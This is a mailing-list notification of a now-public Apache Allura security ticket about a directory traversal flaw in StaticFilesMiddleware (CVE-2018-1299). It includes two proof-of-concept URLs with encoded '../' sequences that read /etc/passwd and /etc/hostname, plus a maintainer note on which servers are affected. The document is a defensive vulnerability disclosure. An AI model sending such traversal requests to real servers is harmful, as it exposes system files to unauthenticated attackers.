- **private**: Yes --> No
--- ** [tickets:#8180] StaticFilesMiddleware allows directory traversal** **Status:** closed **Milestone:** v1.8.0 **Labels:** security **Created:** Mon Jan 29, 2018 06:28 PM UTC by Dave Brondsema **Last Updated:** Mon Feb 05, 2018 04:59 PM UTC **Owner:** Dave Brondsema >From reporter: > The vulnerability allows unauthenticated attackers to retrieve > arbitrary files from the Allura web server. > > PoC URsL: > http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd > http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname ----- The %2F does't seem necessary in my testing. The paster, nginx and apache/mod_wsgi servers seem to protect against this, but gunicorn (which we recommend for production) permits the vulnerability. This has been assigned CVE-2018-1299 --- Sent from forge-allura.apache.org because dev@allura.apache.org is subscribed to https://forge-allura.apache.org/p/allura/tickets/ To unsubscribe from further messages, a project admin can change settings at https://forge-allura.apache.org/p/allura/admin/tickets/options. Or, if this is a mailing list, you can unsubscribe from the mailing list.